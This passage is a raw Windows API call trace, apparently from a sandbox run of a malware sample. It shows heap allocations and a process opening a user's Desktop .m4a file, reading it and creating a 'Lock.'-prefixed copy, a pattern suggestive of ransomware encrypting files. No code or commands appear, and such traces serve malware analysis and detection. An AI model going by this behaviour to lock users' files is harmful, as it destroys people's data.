Size=0x10) returned 0x24a9570 [0188.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.330] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/OPOBoXaM2P4A0m.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\opoboxam2p4a0m.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0188.331] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.331] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0188.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0188.331] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.331] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.331] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0188.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0188.331] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.OPOBoXaM2P4A0m.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.opoboxam2p4a0m.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0188.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0188.332] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0188.332] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.332] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0188.332] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0188.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0188.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.332] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0188.332] ReadFile (in: hFile=0x268, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x911e, lpOverlapped=0x0) returned 1 [0188.334] ReadFile (in: hFile=0x268, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0188.334] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0188.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0188.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0188.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x911e) returned 0x24d7a58 [0188.335] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0188.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0188.335] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0188.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0188.335] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0188.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0188.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0188.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1938 [0188.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0188.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0188.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x911e) returned 0x24d7a58 [0188.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0188.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1948 [0188.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c18 [0188.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0188.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1708 [0188.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0188.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0188.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0188.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c78 [0188.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0188.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0188.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0188.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0188.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0188.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0188.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0188.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x911e) returned 0x24e9ca8 [0188.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0188.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0188.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0188.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0188.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0188.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0188.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0188.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0188.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0188.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0188.338] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0188.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0188.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0188.338] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0188.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0188.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0188.339] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.339] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0188.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0188.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0188.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0188.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0188.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0188.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0188.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.340] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0188.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0188.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0188.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0188.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0188.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0188.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0188.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0188.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0188.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0188.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0188.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.341] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0188.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0188.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0188.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0188.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0188.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0188.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0188.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0188.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0188.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0188.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0188.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.342] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0188.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0188.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0188.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0188.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0188.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0188.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0188.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0188.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.343] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0188.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0188.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0188.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0188.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0188.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0188.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0188.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0188.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0188.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0188.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0188.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.343] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0188.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.344] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0188.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0188.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0188.344] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0188.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0188.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0188.344] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0188.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 